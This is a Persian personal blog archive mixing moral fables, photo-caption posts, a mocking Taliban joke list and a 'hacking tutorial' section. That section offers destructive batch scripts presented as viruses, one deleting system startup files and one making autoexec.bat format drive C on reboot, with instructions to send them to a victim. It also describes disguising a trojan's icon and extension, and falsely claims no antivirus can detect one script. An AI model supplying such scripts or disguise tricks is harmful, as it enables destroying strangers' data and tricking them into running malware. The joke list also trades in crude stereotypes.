حاکمی از برخی شهرها بازدید می كرد و هنگام دیدار از محله ما فرمود: شكایت‌هاتان را صادقانه و آشكارا بازگویید و از هیچ كس نترسید، كه زمانه هراس گذشته است!
دوست من ـ حسن ـ گفت: عالی جناب! گندم و شیر چه شد؟ تامین مسكن چه شد؟ شغل فراوان چه شد؟ و چه شد آن كه داروی بینوایان را به رایگان می بخشد؟
عالی جناب! از این همه هرگز، هیچ ندیدم!
حاکم اندوهگنانه گفت: خدا مرا بسوزاند! آیا همه اینها در سرزمین من بوده است؟ فرزندم! سپاسگزارم كه مرا صادقانه آگاه كردی، به زودی نتیجه نیكو خواهی دید.
سالی گذشت، دوباره حاکم را دیدیم، فرمود: شكایت‌هاتان را صادقانه و آشكارا بازگویید و از هیچ كس نترسید، كه زمانه، زمانه ی دیگری است!
هیچ كس شكایتی نكرد، کسی برنخواست که بگوید: شیر و گندم چه شد؟ تامین مسكن چه شد؟ شغل فراوان چه شد؟ چه شد آن كه داروی بینوایان را به رایگان می‌بخشد؟
تنها صدائی از میان جمع که پرسید: عالی جناب! دوستِ من ـ حسن ـ چه شد؟


گروه اینترنتی پرشین استار | www.Persian-Star.org


انیشتین و راننده اش


انیشتین برای رفتن به سخنرانی ها و تدریس در دانشگاه از راننده مورد اطمینان خود كمك می گرفت. راننده وی نه تنها ماشین او را هدایت می كرد بلكه همیشه در طول سخنرانی ها در میان شنوندگان حضور داشت بطوریكه به مباحث انیشتین تسلط پیدا كرده بود!
یك روز انیشتین در حالی كه در راه دانشگاه بود با صدای بلند گفت كه خیلی احساس خستگی می كند...!
راننده اش پیشنهاد داد كه آنها جایشان را عوض كنند و او جای انیشتین سخنرانی كند چراكه انیشتین تنها در یك دانشگاه استاد بود و در دانشگاهی كه سخنرانی داشت كسی او را نمی شناخت و طبعا نمی توانستند او را از راننده اصلی تشخیص دهند.
انیشتین قبول كرد، اما در مورد اینكه اگر پس از سخنرانی سوالات سختی از وی بپرسند او چه می كند، كمی تردید داشت.
به هر حال سخنرانی راننده به نحوی عالی انجام شد ولی تصور انیشتین درست از آب درآمد.
دانشجویان در پایان سخنرانی شروع به مطرح كردن سوالات خود كردند. در این حین راننده باهوش گفت: سوالات به قدری ساده هستند كه حتی راننده من نیز می تواند به آنها پاسخ دهد.
سپس انیشتین از میان حضار برخواست و به راحتی به سوالات پاسخ داد به حدی كه معلومات به ظاهر "راننده اش" باعث شگفتی حضار شد.


گروه اینترنتی پرشین استار | www.Persian-Star.org


چهره زشت نفرت


معلم یک مدرسه به بچه های کلاس گفت که میخواهد با آنها بازی کند. او به آنها گفت که فردا هر کدام یک کیسه پلاستیکی بردارند و درون آن به تعداد آدمهایی که از آنها بدشان میآید، سیب زمینی بریزند و با خود به کودکستان بیاورند.

فردا بچه ها با کیسه های پلاستیکی به مدرسه آمدند.

در کیسه‌ی بعضی ها ۲ بعضی ها ۳، و بعضی ها ۵ سیب زمینی بود.
معلم به بچه ها گفت : تا یک هفته هر کجا که می روند کیسه پلاستیکی را با خود ببرند.
روزها به همین ترتیب گذشت و کم کم بچه ها شروع کردند به شکایت از بوی سیب زمینی های گندیده. به علاوه، آن هایی که سیب زمینی بیشتری داشتند از حمل آن بار سنگین خسته شده بودند.

پس از گذشت یک هفته بازی بالاخره تمام شد و بچه ها راحت شدند.
معلم از بچه ها پرسید : از اینکه یک هفته سیب زمینی ها را با خود حمل می کردید چه احساسی داشتید؟
بچه ها از اینکه مجبور بودند، سیب زمینی های بد بو و سنگین را همه جا با خود حمل کنند شکایت داشتند.
آنگاه معلم منظور اصلی خود را از این بازی، این چنین توضیح داد:
این درست شبیه وضعیتی است که شما کینه آدم هایی که دوستشان ندارید را در دل خود نگه می دارید و همه جا با خود می برید. بوی بد کینه و نفرت قلب شما را فاسد می‌کند و شما آنرا همه جا همراه خود حمل می‌کنید. حالا که شما بوی بد سیب زمینی‌ها را فقط برای یک هفته نتوانستید تحمل کنید پس چطور می خواهید بوی بد نفرت را برای تمام عمر در دل خود تحمل کنید؟


گروه اینترنتی پرشین استار | www.Persian-Star.org


سنجش عملکرد


پسر كوچكی وارد مغازه ای شد، جعبه نوشابه را به سمت تلفن هل داد و بر روی جعبه رفت تا دستش به دكمه های تلفن برسد و شروع كرد به گرفتن شماره.
مغازه دار متوجه پسر بود و به مكالماتش گوش می داد.
پسرك پرسید: خانم، می توانم خواهش كنم كوتاه كردن چمن های حیاط خانه تان را به من بسپارید؟
زن پاسخ داد: كسی هست كه این كار را برایم انجام می دهد !
پسرك گفت: خانم، من این كار را با نصف قیمتی كه او می دهد انجام خواهم داد!
زن در جوابش گفت: كه از كار این فرد كاملا راضی است.
پسرك بیشتر اصرار كرد و پیشنهاد داد: خانم، من پیاده رو و جدول جلوی خانه را هم برایتان جارو می كنم. در این صورت شما در یكشنبه زیباترین چمن را در كل شهر خواهید داشت.
مجددا زن پاسخش منفی بود.
پسرك در حالی كه لبخندی بر لب داشت، گوشی را گذاشت.
مغازه دار كه به صحبت های او گوش داده بود به سمتش رفت و گفت: پسر...، از رفتارت خوشم آمد؛ به خاطر اینكه روحیه خاص و خوبی داری دوست دارم كاری به تو بدهم.
پسر جواب داد: نه ممنون، من فقط داشتم عملكردم را می سنجیدم.
من همان كسی هستم كه برای این خانم كار می كند !

آیا ما هم میتوانیم چنین خود ارزیابی از كار خود داشته باشیم؟


گروه اینترنتی پرشین استار | www.Persian-Star.org


دوستی و چای !


دوستی با بعضی آدمها مثل نوشیدن چای کیسه ایست هول هولکی و دم دستی. این دوستی ها برای رفع تکلیف خوبند اما خستگی ات را رفع نمی کنند. این چای خوردنها دل آدم را باز نمی کند خاطره نمی شود فقط از سر اجبار می خوریشان که چای خورده باشی به بعدش هم فکر نمی کنی.

دوستی با بعضی آدمها مثل خوردن چای خارجی است. پر از رنگ و بو. این دوستها جان می دهد برای مهمان بازی برای جوکهای خنده دار تعریف کردن برای فرستادن اس ام اس صد تا یک غاز. برای خاطره های دم دستی.

اولش هم حس خوبی به تو می دهند. این چای زود دم خارجی را می ریزی در فنجان بزرگ. می نشینی با شکلات فندقی می خوری و فکر می کنی خوش بحال ترین آدم روی زمینی. فقط نمی دانی چرا باقی چای که مانده در فنجان بعد از یکی دوساعت می شود رنگ قیر یک مایع سیاه و بد بو که چنان به دیواره فنجان رنگ می دهد که انگار در آن مرکب چین ریخته بودی نه چای.

دوستی با بعضی آدمها مثل نوشیدن چای سر گل لاهیجان است. باید نرم دم بکشد. باید انتظارش را بکشی. باید برای عطر و رنگش منتظر بمانی باید صبر کنی. آرام باشی و مقدماتش را فراهم کنی باید آن را بریزی در یک استکان کوچک کمر باریک. خوب نگاهش کنی. عطر ملایمش را احساس کنی و آهسته جرعه جرعه بنوشی اش و زندگی کنی.


گروه اینترنتی پرشین استار | www.Persian-Star.org


تشخیص طالبان از دیدگاه سربازان آمریکایی !


شما ممکن است یک طالبان باشید اگر …

1. برای امرار معاش هروئین درست می کنید اما با مشروب الکلی مشکل اخلاقی دارید.
2. مسلسل ۳۰۰۰ دلاری و راکت انداز ۵۰۰۰ دلاری دارید اما توان خرید یک جفت کفش برای خود ندارید.
3. بیشتر از دندانهایتان همسر اختیار کرده اید.
4. خود را با دست خالی پاک می کنید اما گوشت خوک را کثیف می دانید.
5. فقط دو نوع کت می شناسید: ضد گلوله و انتحاری.
6. کسی را نمی شناسید که علیه ایشان حکم جهاد نداده باشید.
7. تلویزیون را خطرناک می دانید اما به طور عادی زیر لباسهایتان مواد منفجره حمل می کنید.
8. وقتی دریافتید که تلفن همراه استفاده های دیگری غیر از منفجر کردن بمبهای کنار جاده دارد دچار شگفتی شدید.
9. مشکلی با زنها ندارید و فکر می کنید هر مرد باید حداقل دو تای از آنها را داشته باشد.
10. همواره به بز همسایه تان چشم داشته باشید.

نویسنده: محمد جواد ׀ تاریخ: پنج شنبه 5 اسفند 1389برچسب:مطالب جالب و آموزنده, ׀ موضوع: <-CategoryName-> ׀

آموزش هک

حذف My Recent Documents از منوی Start شروع حتما می دونید كه چند تا فایل تصویری ، متنی و ... كه درآخر اجرا كردید در قسمت My Recent Documents در منوی Start ذخیره می شه و شاید شما خوشتون نیاد و بخواید ردی از فایل هایی كه اجرا كردید به جا نزارید . برای حذف My Recent Documents از منوی Start به شكل زیر عمل كنید : از منوی استارت روی Run كلیك كنید . توش بنویسید Regedit و اینتر بزنید تا پنجره ی ریجستری باز بشه . از قسمت چپ پنجره ی ریجستری به آدرس زیر برید :

 HEKY_CURRENT_USER > Software > Microsoft > Windows > CurrentVersion > Policies > Explorer

در این قسمت یك داده از نوع Binary بسازید و اسم اونو NoRecentDocsMenu بزارید . برای ساختن یك داده ی Binary در قسمت سمت راست پنجره راست كلیك كرده و از منوی New گزینه ی Binary Value رو انتخاب كنید . حالا داده ی رو كه ساختید و تغیر نام دادید باز كنید و مقدار اون رو 01 00 00 00 بزارید . یعنی وقتی بازش كردید این عدد رو توش تایپ كنید و ok بزنید . حالا با یه Restart یا Log Off كردن می بینید كه این قسمت حذف شده . برای برگردوندن این قسمت فقط لازمه كه داده ای رو كه ایجاد كردید حذف كنید

 

 

قفل کردن پوشه های xp بدون هیچ نرم افزار [عمومی , ]

برای این کار مثل زیر عمل کنید.

۱- از منوی Start روی Run کلیک کنید تا منوی Run ظاهر بشه خوب حالا توش تایپ کنید cmd و اینتر بزنید تا ms-dos promt ویندوز ظاهر بشه  

2-خب حالابه درایوی که پوشه توشه برید  


3-خب حالا فرمان ren رو اجرا کنید و یه فاصله بدید و اسم پوشه رو وارد کنید و بازم یه فاصله و ودوباره اسم پوشه رو وارد کنید واین فرق که بعد از اسم پوشه بدون هیچ فاصله ای یه نقطه بذارید و کد زیرو بدید  


({2559a1f2-21d7-11d4-bdaf-00c04f60b9f0})


یعنی مثل این خط فرمان:


x: en folder folder.{2559a1f2-21d7-11d4-bdaf-00c04f60b9f0}


تذکر: به جای(x) اسم درایو و به جای folder اسم پوشه خودتونو بدید.


4-خب حالا اینتر کنید و تمام . توی محیط ویندوز به جایی که پوشه بوده برید اگه خوب کارتون رو انجام داده باشید فلدر به شکل یه قفل در اومده  


5- برای برگردوندن این پوشه به حالت اولیه باید تمام مراحل رو انجام بدید فقط توی تغییر نام از اون کد استفاده نکنید یعنی اینطور :


x: en folder.{2559a1f2-21d7-11d4-bdaf-00c04f60b9f0} folder


امیدوارم که از این مطلب استفاده بکنید به درد میخوره چون اگه مثلاً عکس مخفی کرده باشید توی هیچ سرچی نمیشه پیداش

نظر یادت نره

 

 مخفی كردن شاخه ها در Windows XP بدون نیاز به نرم افزار [عمومی , ]

 

اگر می خواهید شاخه ای داشته باشید و كسی از وجود آن با خبر نشود ، كارهای زیر را انجام بدهید:
1- برای دیده نشدن آیكون هر Folder (شاخه)، روی شاخه مورد نظر راست كلیك كنید.Properties را انتخاب كرده و به بخش Customize در بالای پنل Properties بروید. Change Icon را بزنید لیستی از آیكونها در برابر شما ظاهر خواهد شد ، چنانچه این لیست ظاهر نشد، مقابل گزینه Browse بنویسید :
%SystemRoot%system32SHELL32.dll و ok را بزنید. داخل لیست آیكون های نمایش داده شده چند آیكون هست كه شكلی ندارند و با اینكه یك آیكون محسوب میشوند و در این لیست جایی را به خود اختصاص دادهاند اما به ظاهر دیده نمی شوند.یكی از آنها را انتخاب كنید و ok را بزنید. پنل Properties را هم ok كنید. حالا شاخه شما بدون اینكه شكلی داشته باشد فقط اسم دارد.
2- برای اینكه اسم شاخه هم از بین برود، كافیست روی شاخه راست كلیك كنید و Rename دا انتخاب كنید، حالا قبل از اینكه اسم شاخه را تغییر دهید كلیدALT را پایین نگه دارید و شماره 255 را بزنید. حالا كلید ALT را رها كنید تا نام folder مورد نظرتان هم از بین برود.
حالا فقط شما میدانید كه در این محل شاخه یا زیر شاخهای وجود دارد و تنها چنانچه در همان محل یك كلیك كنید مشخص میشود كه آنجا شاخهای وجود دارد. 


 نظر یادت نره
برگرداندن آیکن Show Desktop : [عمومی , 

اگر آیكن Show Desktop ( پایین، سمت چپ، كنار منوی Start ) به صورت خیلی اتفاقی حذف شود، چه میكنید؟!این آیكن یك میانبر معمولی نیست و برگرداندن آن هم مثل بقیه نیست. در بقیه‌ی موارد از Copy و Paste Shorcut در Quick Launch استفاده می‌كنید،ولی این بار چه خواهید کرد؟ طبق روش زیر عمل نمایید تا آیکن حذف شده باز گردد!

برنامه Notepad را باز كرده و این چند خط را وارد كنید:

[Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop
این فایل را با نام Show Desktop.scf در پوشه‌ی زیر ذخیره كنید:


C: Document and Settings Username Application Data Microsoft Internet Explorer Quick Launch

كار تمام است!

نظر یادت نر
منوی start را سریع تر کنید [عمومی , ]

در منوی start زیر منوها پس از 400 میلی ثانیه ظاهر میشود که برای کاربرن حرفه ای ممکن است چند ثانیه طول بکشد شما میتوانید این زیر منوها را به سرعت برق ظاهر کنید آن هم با رفتن به سراغ کلید زیر ( البته قبلا از این کار یادم رفت بهتون بگم که باید از منوی start گزینه run را انتخاب کرده و سپس کلمه regedit را در آن وارد و ok را بزنید و حالا شما در رچیستری ویندوز هستید ) کلید زیر را در رجیستری پیدا کنید : 
HKEY_CURRENT_USERCONTROL PANELDESKTOP 
در این جا فقره ی MENU SHOW DELAY را پیدا کنید مقدار این متغیر طول تاخیر منو را بر حسب میلی ثانیه از 0 تا 999 نشان میدهد که میتوانید با دادن مقدار 1 به آن سرعت آن را بسیار بسیار سریع کنید تا در نیم سوت زیر منوها ظاهر شوند 


 نظر یادت نره

حذف کردن برنامه هایی که پاک نمیشوند ! [ریجستری , ]

به دلایلی که برای ما معلوم نیست بسیاری از برنامه ها به طور کامل پاک (uninstall ) نمیشوند در نتیجه بسیاری از کاربران سعی می کنند با حذف پوشه یا شاخه آن برنامه مقدمات پاک شدن آن را انجام دهند اما نام چنین برنامه هایی برای همیشه در فهرست 
AddRemove Program باقی خواهند ماند برای آنکه فهرست این برنامه ها را از بین ببریم باید از رجیستری استفاده کنیم : 
ابتدا به کلید زیر بروید : 
HKEY_LOCAL_MACHINEMicrosoftWindowsCurent Versionuninstall 
و سپس کلید متناظر با این کلید را باز کنید و حالا برنامه هایی را که نمی توانستید پاک کنید را از این جا حذف کنید تا برای همیشه از بین بروند

 

نظر یادت نره

 

آموزش کامل انواع هک [عمومی , ]

سلام اینم اموزش کامل انواع هک که شامل اموزش هک کردن سایت و وبلاگ هم میشه و به یه سری سوالات کلیدی شما هم جواب داده شده معمولا سوالهای شما در اولش ایناست ۱-هک چیه آیا وارد شدن به یه کامپیوتر هک محسوب میسه؟ ۲-وقتی یه کامپیوتر خاموشه میشه هکش کرد؟ ۳-آیا برای اینکه یک هکر شویم باید خودمان یه بار هک شده باشیم؟ ویه سری سوالات دیگه که به اندازه یه کتاب است 

نظر یادت نره
ویروسی که شناسایی نمیشه [ویروس نویسی , ]

سلام دوستان امروز با یه آموزش بسیار خفن اومدم

این ویروس قابلیتی که داره اینه که هیچ آنتی ویروسی نمی تونه در برابرش کاری کنه و بعد از ری استارت ویندوز فرمت میشه 

برای ساختن این ویروس مراحل زیر رو انجام بدید

به نوت پد رفته و این عبارت رو بنویسید

del autotexec.bat
del config.sys
cd winnt
del system.ini
del win.ini
بعد اونو با فرمت bat سیو کنین و برای قربانی بفرستین

نظر یادت نره

آیکون و پسوند تابلوی ترجان ها را به هر چی که دوست دارید [هک , ]

برای اینکار 2 راه موجود می باشد که من این 2 راه را برای شما میگم: 

راه اول : 

یک عدد فایل تروجان آماده کنید... 

یه wordpad باز کنید ( می تونید رو دسکتاپ راست کلیک کنید به new برید و یه wordpad documernt باز کنید . 

فایل تروجان رو کپی کنید و توی wordpad پیست کنید یا میتونید فایل رو با ماوس بکشید و تو صفحه word رها کنید . 

حال همون فایلی رو که تو word گذاشتید را انتخاب کنید . یعنی روش تک کلیک کنید 

بعد به edit برید و بعد به package object و روی برگه edit package کلیک کنید حالا در پبجره باز شده به edit برید و copy package رو بزنید . 

در آخر هم به یکی از فلودر ها یا درایوها برید راست کلیک کنید و paste رو بزنید . 

به همین آسونی فایل تروجان exe یا هر اسم دیگری را میتونید بی نام و نشون کنید و علاوه بر اینکه ایکون فایل شبیه این بچه مثبتا میشه به همین راحتی هم پسوندشو لو نمی ده اصلا پسوندی در کار نیست . 

راه دوم : 

بر روی فایل تروجانی کا آماده کرده اید راست کلیک کنید وگزینه create shortcut را بر گزینید . حالا یه فایل از همون تروجان با اسم shortcut درست شده است حالا بر روی shortcut آن راست کلیک کنید و گزینه Properties را انتخاب کنید حال در پنجره باز شده جدید در بالای آن گزینه shortcut را انتخاب کنید و بعد بر روی گزینه change icon کیک کنید و در پنجره باز شده 100 ، 200 تا آیکون ظاهر میشود حالا هر کدوم را که دوست دارید انتخاب کنید و یا می تونید با زدن گزینه browse آیکنی که خود شما دارید را برگزینید 

نظر یادت نره


یك ویروس برای فرمت كردن درایو C شخص مورد نظر [ویروس نویسی , ]

برنامه NotePad رو باز كنین بعد فرمان زیر رو توش كپی و پیست كنید:
  

 @echo off
 call attrib -r -h c:autoexec.bat >nul
 echo @echo off >c:autoexec.bat
 echo format /autotest c:/q>nul >>c:autoexec.bat
 call attrib +r +h c:autoexec.bat >nul
 exit


حالا فایل را با پسوند bat ذخیره كنین. مواظب یاشین كه فایل رو اجرا نكنین چون كل اطلاعات درایو سی شما پاك می شه!
  
 این فایل چه كار می كنه؟
 اول كل اطلاعات موجود تو فایل autoexe.bat رو پاك می كنه بعد كد format /autotest c:/q رو توش می زاره وقتی هدف شما كامپیوتر رو ریست و دوباره راه اندازی كنه این كد اجرا می شه و درایو سی فرمت می شه!

------------------------

راستی اگه هم بخواین تعداد و نام پارتیشن مورد نظر رو با كمی تغییر توی فرمان ها می تونین تعیین کنین

نظر یادت نره

 

هکرها و دسته بندی حملات آنها [هک , ]


انواع هکرها: 

1- گروه نفوذگران کلاه سفید: (white hat hackers) : هر کسی که با دانش خود بتواند از سد موانع امنیتی یک شبک بگذرد و به داخل شبکه راه پیدا کند اما اقدام خرابکارانه ای انجام ندهد را یک هکر کلاه سفید می خوانند. خب حتما می گویید عجب ترجمه سختی ما که هیچ نفهمیدیم. عجله نکنید. اینم مثال راحتش. تصور کنید دانشجویی که در یک دانشگاه درس می خونه و می دونه تمامی لیست حضور و غیاب و نمرات دانشجوها در کامپیوتری در اتاق شبکه دانشگاه قرار داره. حالا این دانشجوی کنجکاو ما برای اینکه سر و گوشی آب داده باشه مدتها روی شبکه دانشگاه کار می کنه و از راه های مختلف( که خارج از بحث و حوصله این مقاله است و اگر بخوام راستش رو بگم میشه 100 ها کتاب راجعش نوشت) وارد اون شبکه میشه. یعنی به طور معمول هیچ دانشجویی حق نداره بتونه نمراتش رو ببینه ولی این پسر ناقلای ما یه جورایی وارد شبکه میشه و نمراتش رو می بینه و همچنین حضور و غیابش رو. خب این پسر ناقلا یک هکره. چون این پسر ناقلا فقط نمرات رو می بینه و دست کاری نمی کنه(لابد وجدانش اجازه نمی ده) یک هکر کلاه سفید میشه.
به عنوان مثالی دیگر هکرهای کلاه سفید متخصصین شبکه ای هستند که سوراخهای امنیتی شبکه را پیدا می کنند و به مسوولان گزارش می دهند. مثلا این دانشجوی ناقلا می تونه بره به مسوول شبکه بگه که چطوری وارد سیستمش شده( چون حتما یه ضعفی داشته دیگه) بعدش اونا هم بهش قاقالیلی میدن!


2-گروه نفوذگران کلاه سیاه (Black hat hackers) : به این گروه کراکر –Cracker- می گویند. این افراد آدمهایی هستند که با دانشی که دارند وارد کامپیوتر قربانی خود شده و به دستکاری اطلاعات و یا جاسوسی کردن و یا پخش کردن ویروس و غیرو می پردازند( در انتهای همین مقاله انواع راه های نفوذگری بحث شده). مثلا همون دانشجوی ناقلای مثال بالا اگر بره داخل شبکه و نمراتش رو عوض کنه و به خودش همش بیست بده و یا ایمیل دختر رییس دانشگاه رو از اون تو کش بره و نامه نگاری عاشقانه راه بندازه و یا اصلا روی تمام سیستمهای دانشگاه ویروس بندازه دیگه میشه یک کراکر. پس آقایون و خانومها دانش یک شخص می تونه در جهت مثبت به کار بره یا منفی. لب کلام اینکه اگر اون شخص آدم خوبی بود و تو شبکه دست کاری نکرد بهش میگن کلاه سفید اگر شرور بود و عشق خرابکاری بهش می گن کلاه سیاه. مثل یه آدمی تصور کنید که کشتی گیره. اگر هوای ضعیف ضعفا رو داشته باشه بهش میگن پهلوون اما اگر قلدر بازی واسه همه در بیاره مردم بهش می گن لات و چماق کش!


3-گروه نفوذگران کلاه خاکستری (gray hat hackers) : خب شاید سخت ترین کار توصیف حوزه این گروه از نفوذگرهاست. به این نفوذگرها بعضا whacker هم می گویند( البته زیاد مصطلح نیست فقط برای اطلاع بدانید). این گروه از نفوذگرها بنا به تعریفی حد وسط دو تعریف گذشته هستن. یعنی گاهی شیطنت می کنن و توی سیستم خرابکاری می کنن و گاهی خرابکاری نمی کنن! یعنی اینکه هم کلاه سفیدن هم کلاه سیاه واسه همین رنگشون رو قاطی کردن شده خاکستری! بنا به تعریف دیگه کلاه خاکستری ها شیطونی هاشون هم عامه پسنده یعنی اگر بخوان خرابکاری کنن در جهت اطلاع عموم انجام میدن و به قول معروف فی سبیل الله و برای مردم. مثلا اون دانشجوئه مثال بالا اگه بیاد یه نسخه از لیست حضور و غیاب رو به ایمیل تمام دانشجویان دیگه بزنه و بگه برید حالا حالش رو ببرید و ببینید هرکی چقدر غیبت داره و نمره تحقیقش چند شده.

4- گروه نفوذگران کلاه صورتی ( pink hat hackers): خب این دسته بندی به ندرت دیده شده و اکثر مواقع کلاه صورتی ها رو جزیی از کلاه سیاه ها می دونند. به زبان شیرین فارسی اینها همون جوجه هکرها هستند! این افراد آدمهای کم سوادی هستند که فقط با چند نرم افزار به خرابکاری و آزار و اذیت بقیه اقدام می کنن. مثلا شماها رو توی مسنحر یاهو بوت می کنن و یا توی چت رومها خرابکاری می کنن و یا با نرم افزارهای آماده ایی مثل ساب سون و غیرو اقدام به هک کردن بقیه می کنن و از این قبیل. بنابراین به کلاه صورتی ها می گیم جوجه هکر!

 

انواع حمله هکرها:
- استراق سمع (interception) : در این روش نفوذگر موفق شده که در حین تبادل اطلاعات گوش کند. وی مخفیانه این اطلاعات را مورد نظر داشته و اطلاعات مورد نیاز را برای خودش نسخه برداری می کند. تکنیک ها و روش های بسیاری را هکرها در استراق سمع به کار می برند که یکی از آنها همان sniff بود که در مقاله چند روز قبل کوتاه به آن اشاره کردم. بگذارید مثالی بزنم تا 2 زاریتان کاملا بیفتد. شما در حال مخ زدن در روی اینترنت هستید و شبهای متمادی وقت گذاشتید مخ این دختره رو بزنید و شمارش رو بگیرید. در حال چت کردن هستید که بالاخره عروس خانوم شماره رو به شما میده و شما خوشحال که فردا حتما بهش زنگ می زنید. اما شمای بدبخت نمی دونید که یه هکری ناقلایی کامپیوتر شما رو زیر نظر داره و کلیه چت های شما و اون خانوم رو داره می بینه. اون هکره داره استراق سمع می کنه. حرفاتون براش دلچسب نیست ولی به محض دیدن اون شماره تلفن براش جالب توجه میشه! اینکه شماره تلفن رو یادداشت می کنه و فردا زنگ می زنه به دختره و همون صبحش قرار می گذاره و عشق و حالی که نگو. سر بدبخت شما هم کلاه میره. این جوریاس دیگه. باید زندگی کرد!!!
- دستکاری اطلاعات (modification ): نفوذگر عزیزمون موفق به تغییر اطلاعات میشه. در اینجا بدون اطلاع از قربانی بدبخت, هکر ما اطلاعات رو تغییر میده. مثلا یکی بیاد و بره داخل لیست نمرات یک دانشگاه و نمراتش رو همچین یک حال اساسی بهشون بده و معدلش از 13 بشه 18!

- افزودن اطلاعات و جعل ( fabrication ): در این روش نفوذگر اطلاعات رو به سرقت نمی بره و یا جایگرین نمی کنه بلکه به اطلاعات فقط اطلاعات دیگری رو اضافه می کنه. مثلا فرض کنید مدیر شرکتی نامه ای می زنه به مسوول خرید و لیست خریدی برای شرکت میده. حال شما که هکر بسیار زرنگی هستید این نامه رو جعل کرده و یه سری چیزها بهش اضافه می کنید مثلا می نویسید که خرید یک میز جدید برای آقایی که خودتون باشید! و بعد نامه رو می فرستید برای مامور خرید. مامور خرید بی نوا هم میره لیست رو تهیه می کنه. به واقع شما در اینجا اطلاعات حاوی اون نامه رو همون طور که هست می گذارید باشه ولی بهش مطالب جدید هم اضافه می کنید. هرچند می شه این اقدام رو در زیر شاخه modification آورد اما میگم شما زیاد درگیر گروه بندی نشید بلکه مفهوم رو متوجه بشید که به واقع هدف اصلی این مقاله همینه.
- حمله از نوع وقفه ( interruption): در این نوع حمله هکر باعث اختلال در شبکه و تبادل اطلاعات میشه. تکنیک های بسیاری وجود داره برای هکرها اما 2 مثال بسیار مشهود که نتیجه اش برای یک وبگرد به وضوح مشخصه و در نتیجه همین حملات صورت می گیره یکی در چت رومهاست که گاهی می بیند کسی کامپیوتر سرور چت رو وقفه می ندازه و دیگر شما قادر به چت در آن چت روم نیستید و یا اینکه حتما شنیده اید وقتی هکری به یک سایت حمله کرده و باعث کندی آن سرور شده و این باعث می شود که اگر سایت در عرض 5 ثانیه می بایست در مرورگر شما ظاهر شود یا اصلا قابل بارگزاری نیست (سایت به قول معروف لود نمی شود) و یا اینکه بعد از مثلا 1 دقیقه ظاهر می شود. اینگونه حملات بلای جان کسانی است که مسوول یک سایت و یا شبکه هستند چرا که کندی شبکه همانا و سر و صدای مدیر در آمدن همانا.

نظر یادت نره



 

نویسنده: محمد جواد ׀ تاریخ: یک شنبه 1 اسفند 1389برچسب:آموزش هک, ׀ موضوع: <-CategoryName-> ׀

رودخانه ای که در زمستان تبدیل به جاده می شود!


 













نویسنده: محمد جواد ׀ تاریخ: یک شنبه 1 اسفند 1389برچسب:رودخانه ای که در زمستان تبدیل به جاده می شود!, ׀ موضوع: <-CategoryName-> ׀

ایکاش همه دوستی ها کودکانه و صادقانه باشه ...


ایکاش همه دوستی ها کودکانه و صادقانه باشه ...

گروه اینترنتی پرشین استار | www.Persian-Star.org


گروه اینترنتی پرشین استار | www.Persian-Star.org


گروه اینترنتی پرشین استار | www.Persian-Star.org


گروه اینترنتی پرشین استار | www.Persian-Star.org

نویسنده: محمد جواد ׀ تاریخ: پنج شنبه 14 اسفند 1389برچسب:ایکاش همه دوستی ها کودکانه و صادقانه باشه ,,,, ׀ موضوع: <-CategoryName-> ׀

جاده مرگ، خطرناک ترین جاده جهان

جاده مرگ، خطرناک ترین جاده جهان

بنابر گزارش انجمن بین المللی سفرهای امن جاده ای، عنوان خطرناک ترین جاده دنیا به جاده یونگاس در بولیوی آمریکای جنوبی تعلق می گیرد. اگر جاده های دیگر خطرناک به نظر می رسیدند، پا گذاردن در این جاده نوعی خودکشی محسوب می شود. این جاده دهه 1930 توسط زندانیان جنگ پاراگوئه ساخته شد. یونگاس با اسم مستعار "جاده مرگ" تنها مسیری است که از اعماق جنگل آمازون و رشته کوه های بلند آَندز و دره های عمیق آن می گذرد تا دو شهر لاپاز و کورویکو را به هم متصل کند. رانندگی در طول مسیر جاده یونگاس همانند رانندگی بر روی ترن هوایی است. در بعضی از نقاط ارتفاع جاده به 3600 متر از سطح دریا می رسد حال آنکه دره ای با عمق 2800 متر به فاصله چند سانتی متر از کنار جاده قرار دارد و کوچکترین خطا باعث سقوط به آن دره عمیق مرگبار می شود.

گروه اینترنتی پرشین استار | www.Persian-Star.org


گروه اینترنتی پرشین استار | www.Persian-Star.org


گروه اینترنتی پرشین استار | www.Persian-Star.org


گروه اینترنتی پرشین استار | www.Persian-Star.org


گروه اینترنتی پرشین استار | www.Persian-Star.org


گروه اینترنتی پرشین استار | www.Persian-Star.org


گروه اینترنتی پرشین استار | www.Persian-Star.org


گروه اینترنتی پرشین استار | www.Persian-Star.org


نویسنده: محمد جواد ׀ تاریخ: پنج شنبه 11 اسفند 1389برچسب:جاده مرگ, خطرناک ترین جاده جهان, ׀ موضوع: <-CategoryName-> ׀

هنر چیدمان اینبار با تخم مرغ !

هنر چیدمان اینبار با تخم مرغ !

گروه اینترنتی پرشین استار | www.Persian-Star.org


گروه اینترنتی پرشین استار | www.Persian-Star.org


گروه اینترنتی پرشین استار | www.Persian-Star.org

نویسنده: محمد جواد ׀ تاریخ: پنج شنبه 10 اسفند 1389برچسب:هنر چیدمان اینبار با تخم مرغ !, ׀ موضوع: <-CategoryName-> ׀

صعودی باورنکردنی از آبشاری یخ زده !

صعودی باورنکردنی از آبشاری یخ زده !

گروه اینترنتی پرشین استار | www.Persian-Star.org


گروه اینترنتی پرشین استار | www.Persian-Star.org


گروه اینترنتی پرشین استار | www.Persian-Star.org


گروه اینترنتی پرشین استار | www.Persian-Star.org


نویسنده: محمد جواد ׀ تاریخ: پنج شنبه 9 اسفند 1389برچسب:صعودی باورنکردنی از آبشاری یخ زده !, ׀ موضوع: <-CategoryName-> ׀

کشیدن 6 اتومبیل با موی سر یک زن چینی

کشیدن 6 اتومبیل با موی سر یک زن چینی

از آنجا که بازار انواع رکوردها داغ است این زن چینی هم به رقابت عجیبی دست زد و توانست با موهایش رکورد کشیدن 6 اتومبیل را ثبت کند. او اولین زنی بود که این رکورد را بنام خود در چین ثبت کرد بطوریکه از این رویداد بعنوان بزرگترین دستاورد های ورزشی که در پکن رخ داده است یاد می کنند.

گروه اینترنتی پرشین استار | www.Persian-Star.org


گروه اینترنتی پرشین استار | www.Persian-Star.org


گروه اینترنتی پرشین استار | www.Persian-Star.org


گروه اینترنتی پرشین استار | www.Persian-Star.org


گروه اینترنتی پرشین استار | www.Persian-Star.org


گروه اینترنتی پرشین استار | www.Persian-Star.org



نویسنده: محمد جواد ׀ تاریخ: پنج شنبه 8 اسفند 1389برچسب:کشیدن 6 اتومبیل با موی سر یک زن چینی, ׀ موضوع: <-CategoryName-> ׀

بزرگترین نقاشی دنیا

